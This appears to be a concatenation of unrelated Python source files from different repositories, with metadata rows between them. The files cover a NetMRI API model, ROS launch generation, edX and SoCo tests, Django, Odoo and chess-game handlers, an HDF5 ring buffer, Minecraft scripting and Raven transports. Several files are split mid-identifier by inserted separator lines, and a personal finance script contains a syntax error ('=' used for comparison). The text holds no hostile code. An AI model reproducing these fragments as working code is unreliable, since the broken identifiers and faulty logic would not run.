| ``AvailPortsPercentage:`` Percentage of all ports that are available.
| ``attribute type:`` number
| ``PoEPorts:`` Number of Power-over-Ethernet ports.
| ``attribute type:`` number
| ``DeviceSysLocation:`` The device sysLocation as reported by SNMP.
| ``attribute type:`` string
| ``DeviceVendor:`` The device vendor name.
| ``attribute type:`` string
| ``DeviceModel:`` The device model name.
| ``attribute type:`` string
| ``PhysicalSerialNum:`` The vendor-specific serial number string for the physical entity. The preferred value is the serial number string actually printed on the component itself (if present).
| ``attribute type:`` string
| ``DeviceSysDescr:`` The device sysDescr as reported by SNMP.
| ``attribute type:`` string
| ``DeviceType:`` The NetMRI-determined device type.
| ``attribute type:`` string
| ``FirstSeen:`` The timestamp of when NetMRI first discovered this device.
| ``attribute type:`` datetime
| ``LastSeen:`` The timestamp of when NetMRI last polled data from this device.
| ``attribute type:`` datetime
| ``LastChanged:`` The timestamp of the last change on this device.
| ``attribute type:`` string
| ``PollDuration:`` Number of seconds it took to poll the device.
| ``attribute type:`` number
| ``SwitchingInd:`` A flag indicating whether a switch port forwarding table was retrieved from this device.
| ``attribute type:`` bool
| ``DeviceAssurance:`` Internal use only
| ``attribute type:`` string
| ``VirtualNetworkID:`` The internal identifier for the network which the device is associated to.
| ``attribute type:`` number
| ``UsedAccessPorts:`` Used Access Ports
| ``attribute type:`` number
| ``UsedTrunkPorts:`` Used Trunk Ports
| ``attribute type:`` number
"""
properties = ("id",
"Network",
"DeviceID",
"DeviceName",
"DeviceIPDotted",
"DeviceIPNumeric",
"DeviceDNSName",
"TotalPorts",
"FreePorts",
"FreePortsPercentage",
"AvailPorts",
"AvailPortsPercentage",
"PoEPorts",
"DeviceSysLocation",
"DeviceVendor",
"DeviceModel",
"PhysicalSerialNum",
"DeviceSysDescr",
"DeviceType",
"FirstSeen",
"LastSeen",
"LastChanged",
"PollDuration",
"SwitchingInd",
"DeviceAssurance",
"VirtualNetworkID",
"UsedAccessPorts",
"UsedTrunkPorts",
)
@property
@check_api_availability
def meta(self):
"""
User custom fields
``attribute type:`` model
"""
return self.broker.meta(**{"id": self.id})
|
serein7/openag_brain
|
src/openag_brain/commands/update_launch.py
|
Python
|
gpl-3.0
| 5,299 | 0.001698 |
import os
import rospkg
import lxml.etree as ET
from openag_brain import params
from openag.models import SoftwareModule, SoftwareModuleType
from openag.db_names import SOFTWARE_MODULE, SOFTWARE_MODULE_TYPE
# maping from python types to roslaunch acceptable ones
PARAM_TYPE_MAPPING = {'float' : 'double'}
def create_node(parent, pkg, type, name, args=None):
"""
Creates an xml node for the launch file that represents a ROS node.
`parent` is the parent xml node. `pkg` is the ROS package of the node.
`type` is the name of the executable for the node. `name` is the name
of the ROS node.
"""
e = ET.SubElement(parent, 'node')
e.attrib['pkg'] = pkg
e.attrib['type'] = type
e.attrib['name'] = name
if args:
e.attrib['args'] = args
return e
def create_param(parent, name, value, type):
"""
Creates an xml node for the launch file that represents a ROS parameter.
`parent` is the parent xml node. `name` is the name of the parameter to
set. `value` is the value of the parameter. `type` is the type of the
paremeter (e.g. int, float)
"""
e = ET.SubElement(parent, 'param')
e.attrib['name'] = name
e.attrib['value'] = value
e.attrib['type'] = PARAM_TYPE_MAPPING.get(type, type)
return e
def crea
|
te_group(parent, ns):
"""
Creates an xml node for the launch file that represents a ROS group.
`parent` is the parent xml node. `ns` is the namespace of the group.
"""
e = ET.SubElement(parent, 'group')
e.attrib['ns'] = ns
return e
def create_remap(parent, from_val, to_val):
"""
Creates an xml node for the launch file that represents a name rem
|
apping.
`parent` is the parent xml node. `from_val` is the name that is to be
remapped. `to_val` is the target name.
"""
e = ET.SubElement(parent, 'remap')
e.attrib['from'] = from_val
e.attrib['to'] = to_val
def create_arg(parent, name, default=None, value=None):
"""
Creates an xml node for the launch file that represents a command line
argument. `parent` is the parent xml node. `default` is the default value
of the argument. `value` is the value of the argument. At most one of
`default` and `value` can be provided.
"""
e = ET.SubElement(parent, 'arg')
e.attrib['name'] = name
if default and value:
raise ValueError(
"Argument cannot have both a default value and a value"
)
if default is not None:
e.attrib['default'] = str(default)
if value is not None:
e.attrib['value'] = str(value)
def update_launch(server):
"""
Write a roslaunch file to `modules.launch` based on the software module
configuration read from the `couchdb.Server` instance `server`.
"""
# Form a launch file from the parameter configuration
root = ET.Element('launch')
groups = {None: root}
module_db = server[SOFTWARE_MODULE]
module_types_db = server[SOFTWARE_MODULE_TYPE]
modules = {
module_id: SoftwareModule(module_db[module_id]) for module_id in
module_db if not module_id.startswith('_')
}
for module_id, module in modules.items():
print 'Processing module "{}" from server'.format(module_id)
mod_ns = module.get("namespace", module.get("environment", None))
if not mod_ns in groups:
group = create_group(root, mod_ns)
groups[mod_ns] = group
else:
group = groups[mod_ns]
if module["type"] in module_types_db:
module_type = SoftwareModuleType(module_types_db[module["type"]])
else:
raise RuntimeError(
'Module "{}" references nonexistant module type "{}'.format(
module_id, module["type"]
)
)
args = module.get("arguments", [])
args_str = ", ".join(args)
node = create_node(
group, module_type["package"], module_type["executable"],
module_id, args_str
)
for param_name, param_info in module_type["parameters"].items():
param_value = module.get("parameters", {}).get(
param_name, param_info.get("default", None)
)
param_type = param_info["type"]
if param_value is None:
if param_info.get("required", False):
raise RuntimeError(
'Parameter "{param}" is not defined for software '
'module "{mod_id}"'.format(
param=param_name, mod_id=module.id
)
)
else:
param_value = str(param_value) \
if not isinstance(param_value, bool) else \
str(param_value).lower()
param_type = str(param_type)
create_param(node, param_name, param_value, param_type)
for k,v in module.get("mappings", {}).items():
create_remap(node, k, v)
doc = ET.ElementTree(root)
# Figure out where to write the launch file
rospack = rospkg.RosPack()
pkg_path = rospack.get_path('openag_brain')
launch_path = os.path.join(pkg_path, 'modules.launch')
doc.write(launch_path, pretty_print=True)
|
oyvindmal/SocoWebService
|
unittest/test_alarms.py
|
Python
|
mit
| 538 | 0.003717 |
# -*- coding: utf-8 -*-
""" Tests for the alarms module """
from __future__ import unicode_literals
from soco
|
.alarms import is_valid_recurrence
def test_recurrence():
for recur in ('DAILY', 'WEEKDAYS', 'WEEKENDS', 'ONCE'):
assert is_valid_recurrence(recur)
assert is_valid_recurrence('ON_1')
assert is_valid_recurrence('ON
|
_123412')
assert not is_valid_recurrence('on_1')
assert not is_valid_recurrence('ON_123456789')
assert not is_valid_recurrence('ON_')
assert not is_valid_recurrence(' ON_1')
|
imakin/PersonalAssistant
|
Fundkeep/modul/b__main_backu.py
|
Python
|
mit
| 2,347 | 0.041329 |
#!/usr/bin/env python
import os,sys
folder = "/media/kentir1/Development/Linux_Program/Fundkeep/"
def makinGetYear():
return os.popen("date +'%Y'").read()[:-1]
def makinGetMonth():
return os.popen("date +'%m'").read()[:-1]
def makinGetDay():
return os.popen("date +'%d'").read()[:-1]
def makinGetPrevYear(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%Y'").read()[:-1]
def makinGetPrevMonth(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%m'").read()[:-1]
def makinGetPrevDay(daypassed):
return os.popen("date --date='"+str(daypassed)+" day ago' +'%d'").read()[:-1]
#last entry
f = open(folder+"data/last_entry","r")
le = f.read()
le_y=le[:4]
le_m=le[4:6]
le_d=le[6:]
#input
os.system("gedit "+folder+"var/input")
f = open(folder+"var/input","r")
data = f.read()
f.close()
balance_out = int(data[:data.find(" ")])
balance_ket = data[data.find(" ")+1:-1]
print balance_ket
os.system("mkdir "+folder+"data")
os.system("mkdir "+folder+"data/"+makinGetYear())
os.system("mkdir "+folder+"data/"+makinGetYear()+"/"+makinGetMonth())
os.system("mkdir "+folder+"data/"+makinGetYear()+"/"+makinGetMonth()+"/"+makinGetDay())
balance_before = 0
#ambil balance dr hari sebelumnya
dapet = 0
while (dapet == 0):
dpassed = 1
try:
f = open(folder+"data/"
+makinGetPrevYear(dpassed)
+"/"
+makinGetPrevMonth(dpassed)
+"/"
+makinGetPrevDay(dpassed)
+"/balance_after","r")
if (makinGetDay()=="01"):
t_day = 31
t_bulan = ("0"+str(int(makinGetMonth())-1))[-2:]
|
t_tahun = makinGetYear()
if (i
|
nt(makinGetMonth())=1):
t_bulan = 12
t_tahun = makinGetYear()-1
print t_bulan
dapet = 0
while (dapet==0):
try:
f = open(folder+"data/"+t_tahun+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
print t_day
dapet = 1
balance_before = int(f.read())
except:
t_day = t_day - 1
f.close()
else:
t_day = int(makinGetDay())-1
#~ t_bulan = ("0"+str(int(makinGetMonth())))[-2:]
t_bulan = makinGetMonth()
f = open(folder+"data/"+makinGetYear()+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
balance_before = int(f.read())
#bila fresh input
try:
f = open(folder+"data/"+t_tahun+"/"+t_bulan+"/"+("0"+str(t_day))[-2:]+"/balance_after","r")
except:
#bila hanya mengupdate isi balance_out (pengeluaran hari ini)
|
stvstnfrd/edx-platform
|
common/lib/xmodule/xmodule/tests/test_library_content.py
|
Python
|
agpl-3.0
| 26,994 | 0.002741 |
# -*- coding: utf-8 -*-
"""
Basic unit tests for LibraryContentBlock
Higher-level tests are in `cms/djangoapps/contentstore/tests/test_libraries.py`.
"""
import six
from bson.objectid import ObjectId
from fs.memoryfs import MemoryFS
from lxml import etree
from mock import Mock, patch
from search.search_engine_base import SearchEngine
from six.moves import range
from web_fragments.fragment import Fragment
from xblock.runtime import Runtime as VanillaRuntime
from xmodule.library_content_module import ANY_CAPA_TYPE_VALUE, LibraryContentBlock
from xmodule.library_tools import LibraryToolsService
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.factories import CourseFactory, LibraryFactory
from xmodule.modulestore.tests.utils import MixedSplitTestCase
from xmodule.tests import get_test_system
from xmodule.validation import StudioValidationMessage
from xmodule.x_module import AUTHOR_VIEW
from .test_course_module import DummySystem as TestImportSystem
dummy_render = lambda block, _: Fragment(block.data) # pylint: disable=invalid-name
class LibraryContentTest(MixedSplitTestCase):
"""
Base class for tests of LibraryContentBlock (library_content_block.py)
"""
def setUp(self):
super(LibraryContentTest, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.tools = LibraryToolsService(self.store, self.user_id)
self.library = LibraryFactory.create(modulestore=self.store)
self.lib_blocks = [
self.make_block("html", self.library, data="Hello world from block {}".format(i))
for i in range(1, 5)
]
self.course = CourseFactory.create(modulestore=self.store)
self.chapter = self.make_block("chapter", self.course)
self.sequential = self.make_block("sequential", self.chapter)
self.vertical = self.make_block("vertical", self.sequential)
self.lc_block = self.make_block(
"library_content",
self.vertical,
max_count=1,
source_library_id=six.text_type(self.library.location.library_key)
)
def _bind_course_module(self, module):
"""
Bind a module (part of self.course) so we can access student-specific data.
"""
module_system = get_test_system(course_id=module.location.course_key)
module_system.descriptor_runtime = module.runtime._descriptor_system # pylint: disable=protected-access
module_system._services['library_tools'] = self.tools # pylint: disable=protected-access
def get_module(descriptor):
"""Mocks module_system get_module function"""
sub_module_system = get_test_system(course_id=module.location.course_key)
sub_module_system.get_module = get_module
sub_module_system.descriptor_runtime = descriptor._runtime # pylint: disable=protected-access
descriptor.bind_for_student(sub_module_system, self.user_id)
return descriptor
module_system.get_module = get_module
module.xmodule_runtime = module_system
class TestLibraryContentExportImport(LibraryContentTest):
"""
Export and import tests for LibraryContentBlock
"""
maxDiff = None
def test_xml_export_import_cycle(self):
"""
Test the export-import cycle.
"""
# Children will only set after calling this.
self.lc_block.refresh_children()
lc_block = self.store.get_item(self.lc_block.location)
expected_olx = (
'<library_content display_name="{block.display_name}" max_count="{block.max_count}"'
' source_library_id="{block.source_library_id}" source_library_version="{block.source_library_version}">\n'
' <html url_name="{block.children[0].block_id}"/>\n'
' <html url_name="{block.children[1].block_id}"/>\n'
' <html url_name="{block.children[2].block_id}"/>\n'
' <html url_name="{block.children[3].block_id}"/>\n'
'</library_content>\n'
).format(
block=lc_block,
)
export_fs = MemoryFS()
# Set the virtual FS to export the olx to.
lc_block.runtime._descriptor_system.export_fs = export_fs # pylint: disable=protected-access
# Export the o
|
lx.
node = etree.Element("unknown_root")
lc_block.add_xml_to_node(node)
# Read it back
with export_fs.open('{dir}/{file_name}.xml'.format(
dir=lc_block.scope_ids.usage_id.block_type,
file_name=lc_block.scope_ids.usage_id.block_id
)) as f:
exported_olx = f.read()
# And compare.
assert exported_olx == expected_olx
runtime = TestImportSystem(load_error_modules=True, c
|
ourse_id=lc_block.location.course_key)
runtime.resources_fs = export_fs
# Now import it.
olx_element = etree.fromstring(exported_olx)
id_generator = Mock()
imported_lc_block = LibraryContentBlock.parse_xml(olx_element, runtime, None, id_generator)
# Check the new XBlock has the same properties as the old one.
assert imported_lc_block.display_name == lc_block.display_name
assert imported_lc_block.source_library_id == lc_block.source_library_id
assert imported_lc_block.source_library_version == lc_block.source_library_version
assert imported_lc_block.mode == lc_block.mode
assert imported_lc_block.max_count == lc_block.max_count
assert imported_lc_block.capa_type == lc_block.capa_type
assert len(imported_lc_block.children) == 4
assert imported_lc_block.children == lc_block.children
class LibraryContentBlockTestMixin(object):
"""
Basic unit tests for LibraryContentBlock
"""
problem_types = [
["multiplechoiceresponse"], ["optionresponse"], ["optionresponse", "coderesponse"],
["coderesponse", "optionresponse"]
]
problem_type_lookup = {}
def _get_capa_problem_type_xml(self, *args):
""" Helper function to create empty CAPA problem definition """
problem = "<problem>"
for problem_type in args:
problem += "<{problem_type}></{problem_type}>".format(problem_type=problem_type)
problem += "</problem>"
return problem
def _create_capa_problems(self):
"""
Helper function to create a set of capa problems to test against.
Creates four blocks total.
"""
self.problem_type_lookup = {}
for problem_type in self.problem_types:
block = self.make_block("problem", self.library, data=self._get_capa_problem_type_xml(*problem_type))
self.problem_type_lookup[block.location] = problem_type
def test_lib_content_block(self):
"""
Test that blocks from a library are copied and added as children
"""
# Check that the LibraryContent block has no children initially
# Normally the children get added when the "source_libraries" setting
# is updated, but the way we do it through a factory doesn't do that.
assert len(self.lc_block.children) == 0
# Update the LibraryContent module:
self.lc_block.refresh_children()
self.lc_block = self.store.get_item(self.lc_block.location)
# Check that all blocks from the library are now children of the block:
assert len(self.lc_block.children) == len(self.lib_blocks)
def test_children_seen_by_a_user(self):
"""
Test that each student sees only one block as a child of the LibraryContent block.
"""
self.lc_block.refresh_children()
self.lc_block = self.store.get_item(self.lc_block.location)
self._bind_course_module(self.lc_block)
# Make sure the runtime knows that the block's children vary per-user:
assert self.lc_block.has_dynamic_children()
assert len(self.lc_block.children) == len(self.lib_blocks)
# Check how many children each user will see:
assert len(self.lc_block.get_child_descriptors()) == 1
# Check that get_content_titles() doesn't return titl
|
pacocampo/Backend
|
traveleando/project/usuario/admin.py
|
Python
|
gpl-3.0
| 213 | 0.018779 |
from django.contrib import admin
from . import models
# Register your mod
|
els here.
#admin.site.register(models.MyUser)
@admin.registe
|
r(models.MyUser)
class MyUserAdmin(admin.ModelAdmin):
list_display = ['user']
|
AHAPX/dark-chess
|
src/handlers/v2/game.py
|
Python
|
gpl-3.0
| 7,424 | 0.002963 |
from flask import request
from cache import (
add_to_queue, get_from_queue, get_from_any_queue, set_cache, get_cache,
delete_cache
)
import config
import consts
from connections import send_ws
from consts import WS_CHAT_MESSAGE
from decorators import validate
import errors
from game import Game
from handlers.v2.base import RestBase
from helpers import generate_token, get_prefix
from models import User, GamePool
from loggers import logger
from validators import GameNewValidator, GameMoveValidator
class RestGameBase(RestBase):
pre_methods = ['load_game']
def load_game(self, token):
try:
game = Game.load_game(token)
except errors.GameNotStartedError as e:
data = {
'type': consts.TYPES[e.type]['name'],
'limit': e.limit,
}
if (e.token):
data['invite'] = e.token
return data
except errors.GameNotFoundError as e:
raise errors.APIException(e.message)
if game._loaded_by == consts.WHITE:
if game.model.player_white is not None and game.model.player_white != request.user:
raise errors.APIException('wrong user')
else:
if game.model.player_black is not None and game.model.player_black != request.user:
raise errors.APIException('wrong user')
self.game = game
class RestTypes(RestBase):
def get(self):
types = [{
'name': t['name'],
'description': t['description'],
'periods': [{
'name': k,
'title': v[0],
} for k, v in sorted(t['periods'].items(), key=lambda a: a[1][1])],
} for t in consts.TYPES.values() if t['name'] != 'no limit']
return {'types': types}
class RestNewGame(RestBase):
def get(self):
result = []
count = 0
for pool in GamePool.select().where(
GamePool.is_started == False,
GamePool.is_lost == False,
GamePool.player1 is not None,
).order_by(GamePool.date_created.desc()):
if pool.user1 and pool.user1 == request.user:
continue
result.append({
'id': pool.pk,
'date_created': pool.date_created.isoformat(),
'user': pool.user1.username if pool.user1 else None,
'type': consts.TYPES[pool.type_game]['name'],
'limit': pool.time_limit,
})
count += 1
if count > 9:
break
return {'games': result}
@validate(GameNewValidator)
def post(self):
game_type = self.data['type']
game_limit = self.data['limit']
token = generate_token(True)
pool = GamePool.create(
player1 = token,
user1 = request.user,
type_game = game_type,
time_limit = game_limit,
)
set_cache('wait_{}'.format(token), (game_type, game_limit))
return {'game': token}
class RestAcceptGame(RestBase):
def post(self, game_id):
try:
pool = GamePool.get(GamePool.pk == game_id)
except GamePool.DoesNotExist:
raise errors.APINotFound('game')
except Exception as e:
raise errors.APIException('wrong format')
if pool.user1 and pool.user1 == request.user:
raise errors.APIException('you cannot start game with yourself')
pool.player2 = generate_token(True)
pool.user2 = request.user
pool.is_started = True
pool.save()
game = Game.new_game(
pool.player1, pool.player2, pool.type_game, pool.time_limit,
white_user=pool.user1, black_user=pool.user2
)
delete_cache('wait_{}'.format(pool.player1))
result = {'game': pool.player2}
result.update(game.get_info(consts.BLACK))
return result
class RestNewInvite(RestBase):
@validate(GameNewValidator)
def post(self):
game_type = self.data['type']
game_limit = self.data['limit']
if game_type != consts.TYPE_NOLIMIT and not game_limit:
raise errors.APIException('game limit must be set for no limit game')
token_game = generate_token(True)
token_invite = generate_token(True)
set_cache('invite_{}'.format(token_invite), (token_game, game_type, game_limit))
if request.user:
set_cache('user_{}'.format(token_game), request.user.pk, 3600)
set_cache('wait_{}'.format(token_game), (game_type, game_limit, token_invite))
return {
'game': token_game,
'invite': token_invite,
}
class RestAcceptInvite(RestBase):
def get(self, token):
try:
enemy_token, game_type, game_limit = get_cache('invite_{}'.format(token))
except:
raise errors.APINotFound('game')
enemy_user = None
user_id = get_cache('user_{}'.format(enemy_token))
if user_id:
try:
enemy_user = User.get(pk=user_id)
except User.DoesNotExist:
# TODO: if user not found game will be created with None as white player
pass
user_token = generate_token(True)
game = Game.new_game(
|
enemy_token, user_token, game_type, game_limit,
white_user=enemy_user, black_user=request.user
)
delete_cache('wait_{}'.format(enemy_token))
result = {'game': user_token}
re
|
sult.update(game.get_info(consts.BLACK))
return result
class RestGames(RestBase):
def get(self):
from models import Game
result = {
'games': {
'actives': [],
'ended': [],
}
}
if request.user:
games = Game.select().where(
Game.date_end == None,
(Game.player_white == request.user) | (Game.player_black == request.user),
)
for game in games:
if game.player_white == request.user:
result['games']['actives'].append(game.white)
else:
result['games']['actives'].append(game.black)
games = Game.select().where(
Game.date_end != None,
(Game.player_white == request.user) | (Game.player_black == request.user),
).limit(10)
for game in games:
if game.player_white == request.user:
result['games']['ended'].append(game.white)
else:
result['games']['ended'].append(game.black)
return result
class RestInfo(RestGameBase):
def get(self, *args, **kwargs):
return self.game.get_info()
class RestMoves(RestGameBase):
def get(self, *args, **kwargs):
return self.game.moves()
@validate(GameMoveValidator)
def post(self, *args, **kwargs):
coor1 = self.data['coor1']
coor2 = self.data['coor2']
return self.game.move(coor1, coor2)
class RestDraw(RestGameBase):
# TODO: add get
def post(self, *args, **kwargs):
return self.game.draw_accept()
def delete(self, *args, **kwargs):
return self.game.draw_refuse()
class RestResign(RestGameBase):
def post(self, *args, **kwargs):
return self.game.resign()
|
ygol/odoo
|
addons/website_event_track_online/models/event_event.py
|
Python
|
agpl-3.0
| 2,962 | 0.002701 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api, _
from odoo.addons.http_routing.models.ir_http import slug
class EventEvent(models.Model):
_inherit = "event.event"
community_menu = fields.Boolean(
"Community Menu", compute="_compute_community_menu",
readonly=False, store=True,
help="Display community tab on website")
community_menu_ids = fields.One2many(
"website.event.menu", "event_id", string="Event Community Menus",
domain=[("menu_type", "=", "community")])
@api.depends("event_type_id", "website_menu", "community_menu")
def _compute_community_menu(self):
""" At type onchange: synchronize. At website_menu update: synchronize. """
for event in self:
if event.event_type_id and event.event_type_id != event._origin.event_type_id:
event.community_menu = event.event_type_id.community_menu
elif event.website_menu and event.website_menu != event._origin.website_menu or not event.community_menu:
event.community_menu = True
elif not event.website_menu:
event.community_menu = False
# ------------------------------------------------------------
|
# WEBSITE MENU MANAGEMENT
# ------------------------------------------------------------
# OVERRIDES: ADD SEQUENCE
def _get_menu_update_fields(self):
updat
|
e_fields = super(EventEvent, self)._get_menu_update_fields()
update_fields += ['community_menu']
return update_fields
def _update_website_menus(self, menus_update_by_field=None):
super(EventEvent, self)._update_website_menus(menus_update_by_field=menus_update_by_field)
for event in self:
if event.menu_id and (not menus_update_by_field or event in menus_update_by_field.get('community_menu')):
event._update_website_menu_entry('community_menu', 'community_menu_ids', '_get_community_menu_entries')
def _get_menu_type_field_matching(self):
res = super(EventEvent, self)._get_menu_type_field_matching()
res['community'] = 'community_menu'
return res
def _get_community_menu_entries(self):
self.ensure_one()
return [(_('Community'), '/event/%s/community' % slug(self), False, 80, 'community')]
def _get_track_menu_entries(self):
""" Remove agenda as this is now managed separately """
self.ensure_one()
return [
(_('Talks'), '/event/%s/track' % slug(self), False, 10, 'track'),
(_('Agenda'), '/event/%s/agenda' % slug(self), False, 70, 'track')
]
def _get_track_proposal_menu_entries(self):
""" See website_event_track._get_track_menu_entries() """
self.ensure_one()
return [(_('Talk Proposals'), '/event/%s/track_proposal' % slug(self), False, 15, 'track_proposal')]
|
mivade/qCamera
|
qcamera/ring_buffer.py
|
Python
|
bsd-2-clause
| 4,596 | 0.001958 |
"""Ring buffer for automatic storage of images"""
import os.path
import logging
from datetime import datetime
import numpy as np
from scipy.misc import imsave
import tables
class RingBuffer(object):
"""Ring buffer class.
Attributes
----------
directory : str
Location to store the ring buffer file.
recording : bool
True when data is being saved to the ring buffer.
N : int
Number of images to store in the ring buffer.
"""
def __init__(self, **kwargs):
"""Initialize the ring buffer.
Keyword arguments
-----------------
N : int
Number of images to store in the ring buffer.
directory : str
The directory to buffer images to.
filename : str
Filename to use for the HDF5 file.
recording : bool
Activate recording when True, disable when False.
logger : str
The name of the logger to use. Defaults to 'RingBuffer'.
roi : list
The currently selected region of interest.
"""
directory = kwargs.get('directory', '.')
filename = kwargs.get('filename', 'rbuffer.h5')
recording = kwargs.get('recording', True)
N = int(kwargs.get('N', 100))
logger = kwargs.get('logger', 'RingBuffer')
roi = kwargs.get('roi', [10, 100, 10, 100])
assert isinstance(directory, (str, unicode))
assert isinstance(filename, (str, unicode))
assert isinstance(recording, (int, bool))
assert isinstance(logger, (str, unicode))
assert isinstance(roi, (list, tuple, np.ndarray))
self.recording = recording
self.N = N
self.logger = logging.getLogger(logger)
self.roi = roi
self._index = 0
# Initialize HDF5 database.
self.filename = os.path.join(directory, filename)
self._db = tables.open_f
|
ile(self.filenam
|
e, 'w', title="Ring Buffer")
self._db.create_group('/', 'images', 'Buffered Images')
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
self.close()
def close(self):
self._db.close()
def get_current_index(self):
"""Return the current index. This is in a function to
hopefully prevent the user from accessing _index directly
which could lead to bad things if it is modified!
"""
return self._index
def set_recording_state(self, state):
"""Explicitly set the recording state to state."""
assert isinstance(state, (bool, int))
self.recording = state
def toggle(self):
"""Toggle the recording state."""
self.recording = not self.recording
def write(self, data):
"""Write data to the ring buffer file."""
if not self.recording:
return
name = 'img{:04d}'.format(self._index)
try:
self._db.get_node('/images/' + name).remove()
except tables.NoSuchNodeError:
pass
finally:
# TODO: Adapt to CArray for compression
#filters = tables.Filters(complevel=5, complib='zlib')
arr = self._db.create_array('/images', name, data)
arr.attrs.timestamp = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S.%f')
arr.attrs.roi = self.roi
arr.flush()
self._db.flush()
self._index = self._index + 1 if self._index < self.N - 1 else 0
def read(self, index):
"""Return data from the ring buffer file."""
img = self._db.get_node('/images/img{:04d}'.format(index))
return np.array(img)
def get_roi(self, index):
"""Return the recorded ROI for the given index."""
return self._db.get_node('/images/img{:04d}'.format(index)).attrs.roi
def save_as(self, filename):
"""Save the ring buffer to file filename. The output format
will depend on the extension of filename.
"""
self.logger.warning("Saving ring buffers to non-HDF5 formats is not yet properly implemented!")
# Save as PNG files in a zip archive.
if filename[-3:] == 'zip':
for node in self._db.list_nodes('/images'):
data = node.read()
imsave('./img.png', data)
if __name__ == "__main__":
from numpy import random
size = 512
img_size = (size, size)
with RingBuffer(N=100) as rb:
for i in range(200):
img = random.random(img_size)
rb.write(img)
rb.save_as('test.zip')
|
craigem/MyAdventures
|
buildHouse2.py
|
Python
|
gpl-3.0
| 1,494 | 0 |
# Build a simple house.
# Import necessary modules.
import mcpi.minecraft as minecraft
import mcpi.block as block
# Connect to Minecraft.
mc = minecraft.Minecr
|
aft.create()
# Set a base size for the house.
SIZE = 20
# Create the house function.
def house():
# Calculate the midpoints, used to position doors and windows.
midx = x + SIZE / 2
midy = y + SIZE / 2
# Build the outer shell.
mc.setBlocks(
x, y, z,
x + SIZE, y + SIZE, z + SIZE,
block.COBBLESTONE.id
)
# Carve out the inside of the house.
mc.setBlocks(
x +
|
1, y, z + 1,
x + SIZE - 2, y + SIZE - 1, z + SIZE - 2,
block.AIR.id
)
# Carve out the doorway.
mc.setBlocks(
midx - 1, y, z,
midx + 1, y + 3, z,
block.AIR.id
)
# Carve out two windows.
mc.setBlocks(
x + 3, y + SIZE - 3, z,
midx - 3, midy + 3, z,
block.GLASS.id
)
mc.setBlocks(
midx + 3, y + SIZE - 3, z,
x + SIZE - 3, midy + 3, z,
block.GLASS.id
)
# Add the roof
mc.setBlocks(
x, y + SIZE + 1, z,
x + SIZE, y + SIZE + 1, z + SIZE,
block.WOOD.id
)
# Add some carpet
mc.setBlocks(
x + 1, y - 1, z + 1,
x + SIZE - 2, y - 1, z + SIZE - 2,
block.WOOL.id, 14
)
# Get your position:
pos = mc.player.getTilePos()
# Store your coordinates.
x = pos.x + 2
y = pos.y
z = pos.z
house()
|
inspirehep/raven-python
|
raven/transport/registry.py
|
Python
|
bsd-3-clause
| 2,913 | 0.00103 |
"""
raven.transport.registry
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import sys
# TODO(dcramer): we really should need to import all of these by default
from raven.transport.eventlet import EventletHTTPTransport
from raven.transport.exceptions import Du
|
plicateScheme
from raven.transport.http import HTTPTransport
from raven.transport.gevent import GeventedHTTPTransport
from raven.transport.r
|
equests import RequestsHTTPTransport
from raven.transport.threaded import ThreadedHTTPTransport
from raven.transport.twisted import TwistedHTTPTransport
from raven.transport.tornado import TornadoHTTPTransport
from raven.transport.udp import UDPTransport
from raven.utils import urlparse
if sys.version_info >= (3, 3):
from raven.transport.aiohttp import AioHttpTransport
class TransportRegistry(object):
def __init__(self, transports=None):
# setup a default list of senders
self._schemes = {}
self._transports = {}
if transports:
for transport in transports:
self.register_transport(transport)
def register_transport(self, transport):
if not hasattr(transport, 'scheme') or not hasattr(transport.scheme, '__iter__'):
raise AttributeError('Transport %s must have a scheme list', transport.__class__.__name__)
for scheme in transport.scheme:
self.register_scheme(scheme, transport)
def register_scheme(self, scheme, cls):
"""
It is possible to inject new schemes at runtime
"""
if scheme in self._schemes:
raise DuplicateScheme()
urlparse.register_scheme(scheme)
# TODO (vng): verify the interface of the new class
self._schemes[scheme] = cls
def supported_scheme(self, scheme):
return scheme in self._schemes
def get_transport(self, parsed_url, **options):
full_url = parsed_url.geturl()
if full_url not in self._transports:
# Remove the options from the parsed_url
parsed_url = urlparse.urlparse(full_url.split('?')[0])
self._transports[full_url] = self._schemes[parsed_url.scheme](parsed_url, **options)
return self._transports[full_url]
def compute_scope(self, url, scope):
"""
Compute a scope dictionary. This may be overridden by custom
transports
"""
transport = self._schemes[url.scheme](url)
return transport.compute_scope(url, scope)
default_transports = [
HTTPTransport,
ThreadedHTTPTransport,
GeventedHTTPTransport,
TwistedHTTPTransport,
RequestsHTTPTransport,
TornadoHTTPTransport,
UDPTransport,
EventletHTTPTransport,
]
if sys.version_info >= (3, 3):
default_transports += [AioHttpTransport]
|
nonZero/demos-python
|
src/examples/short/iteration/iterator_generator.py
|
Python
|
gpl-3.0
| 652 | 0.001534 |
#!/usr/bin/python2
'''
This is an example of how to build a simple generator
'''
def my_reverse(data):
for index in ra
|
nge(len(data) - 1, -1, -1):
yield data[index]
for char in my_reverse('golf'):
print(char)
'''
Notice that 'my_reverse' is still recognized as a plain function and not
'generator' or something.
When you do use it for da
|
ta the return value is a 'generator'.
Compare this to pythons own 'reversed' generator:
- it is built in so it's type is type
- when using it as a generator it's type is 'reversed'.
'''
print(type(my_reverse))
print(type(my_reverse('golf')))
print(type(reversed))
print(type(reversed('golf')))
|
openatx/uiautomator2
|
examples/multi-thread-example.py
|
Python
|
mit
| 747 | 0.001339 |
# coding: utf-8
#
# GIL limit python multi-thread effectiveness.
# But is seems fine, because these operation have so many socket IO
# So it seems no need to use multiprocess
#
import uiautomator2 as u2
import adbutils
import threading
from logzero import logger
def worker(d: u2.Device):
d.app_start("io.appium.android.apis", stop=True)
d(text="App
|
").wait
|
()
for el in d.xpath("@android:id/list").child("/android.widget.TextView").all():
logger.info("%s click %s", d.serial, el.text)
el.click()
d.press("back")
logger.info("%s DONE", d.serial)
